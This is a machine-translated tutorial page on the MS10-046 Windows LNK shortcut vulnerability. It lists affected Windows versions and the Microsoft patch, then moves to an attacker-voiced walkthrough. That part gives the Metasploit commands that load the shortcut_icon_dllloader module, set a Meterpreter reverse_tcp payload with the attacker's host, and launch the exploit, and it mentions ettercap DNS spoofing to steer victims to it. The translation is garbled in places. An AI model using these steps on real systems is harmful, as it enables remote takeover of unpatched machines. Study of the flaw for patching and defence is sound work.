Microsoft Windows shortcuts LNK file Automatic Code Execution Vulnerability (MS10-046)

Source: Internet
Author: User
Tags dns spoofing

1. Vulnerability Definition

 

Windows supports shortcuts or LNK files. The LNK file is a reference to a local file. clicking the LNK file has the same effect as clicking the target specified by the shortcut.

Windows does not properly process the LNK file. The specially crafted LNK file may cause Windows to automatically execute the code specified by the shortcut file. The code may be in a USB drive, local or remote file system, optical drive, or other location. Using resource manager to view the location of the LNK file is enough to trigger this vulnerability. By default, Windows Enables automatic loading and playback. Therefore, Windows automatically opens the resource manager after connecting to a Removable device (such as USB flash memory. Other applications that display file icons can also be used as attack carriers for this vulnerability. The affected Windows systems are shown in table 1 below:

 

Vulnerability name

Affected Windows System Types

MS10-046

Microsoft Windows XP SP3

Microsoft Windows XP SP2

Microsoft Windows Vista SP2

Microsoft Windows Vista SP1

Microsoft Windows Server 2008

Microsoft Windows Server 2008 SP2

Microsoft Windows Server 2008 R2

Microsoft Windows Server 2003 SP2

Microsoft Windows 7

 

2. Patches

Microsoft has released a Security Bulletin (MS10-046) and patches for this:

MS10-046: Vulnerability in Windows Shell cocould Allow Remote Code Execution (2286198), links to its detailed documentation are as follows:

Http://www.microsoft.com/china/technet/security/bulletin/MS10-046.mspx

This security update addresses a publicly disclosed vulnerability in Windows Shell. If a special shortcut icon is displayed, the vulnerability may allow remote code execution. Attackers who successfully exploit this vulnerability can obtain the same user permissions as local users. You can use third-party tools such as 360 security guard to update patches in addition to automatic updates provided by Windows.

 

Attack operation:

 

Next, we start to use Metasploit3 for overflow attacks. The detailed steps are as follows.

Step 1: Go to Metasploit and load the attack code.

As an attacker, the first step is to access Metasploit. In addition to clicking Metasploit directly from the menu, you can also open any Shell in the graphic interface and directly enter the msfconsole command to enter Metasploit. As shown in-1, you can see the current number of codes, parameter status, and the latest version.

 

 

The command is as follows: search ms10_046

After you press enter, you can see the search result shown in-2. A usable attack code named "ms10_046_shortcut_icon_dllloader" is displayed. Next, you can load the attack code. The specific command is as follows:

 

Use windows/browser/ms10_046_shortcut_icon_dllloader before using an attack code, you must first check the required setting parameters. Therefore, enter the following command: after the show options press enter, the attack code setting parameters are displayed, as shown in-3. The SRVHOST, SRVPORT, and URIPATH parameters are mandatory, SRVPORT and URIPATH are set by default. Step 2: configure the attack code on metasploit3. Now that you know the required configuration parameters, you can use the set command to configure parameters in sequence. Specifically, the overflow PAYLOAD is set to reverse overflow. To use Meterpreter with enhanced Shell in Metasploit, set PAYLOAD to windows/metepreter/reverse_tcp, later, attackers will also use ettercap to perform DNS spoofing attacks on the target. Therefore, the attacker should set the destination of the port to its own IP address, that is, set the LHOST to its own IP address. Finally, execute overflow using exploit. The specific command is as follows: set SRVHOST the attacker's own IP address set PAYLOAD windows/meterpreter/reverse_tcp set LHOST the attacker's own IP Address exploit, and press enter in sequence, as shown in-4, an http: // 10.23.0.3: 80 URL is enabled, corresponding to a shared directory \ 10.23.0.3 \ owhBPhxMJ \. Metasploit can be triggered when http: // 10.23.0.3: 80 is accessed.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.